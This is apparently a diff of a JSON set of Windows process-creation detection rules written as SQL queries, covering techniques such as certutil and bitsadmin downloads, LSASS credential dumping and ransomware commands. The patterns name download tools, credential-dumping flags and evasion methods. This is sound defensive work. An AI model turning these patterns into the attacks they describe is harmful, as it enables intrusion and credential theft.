@@ -6786,18 +6616,18 @@ "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", - "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "status": "test", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.resource_development", "attack.t1587.001" 
@@ -6807,90 +6637,86 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "status": "test", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.impact", + "attack.s0575", + "attack.t1486" ], 
"falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND 
NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "status": "test", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "System administrator usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", + "title": "Suspicious Invoke-WebRequest Execution", + 
"id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR 
(ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { "title": "Suspicious Child Process Created as System", 
@@ -6912,581 +6738,540 @@ "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", - "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - NirCmd Execution As LOCAL SYSTEM", + "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "status": "test", + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.005" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of renamed version of PAExec. 
Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_renamed_paexec.yml" }, { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": 
"4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", - "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "status": "test", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "status": "test", - "description": "Detects the 
execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", - "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use 
that method" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE 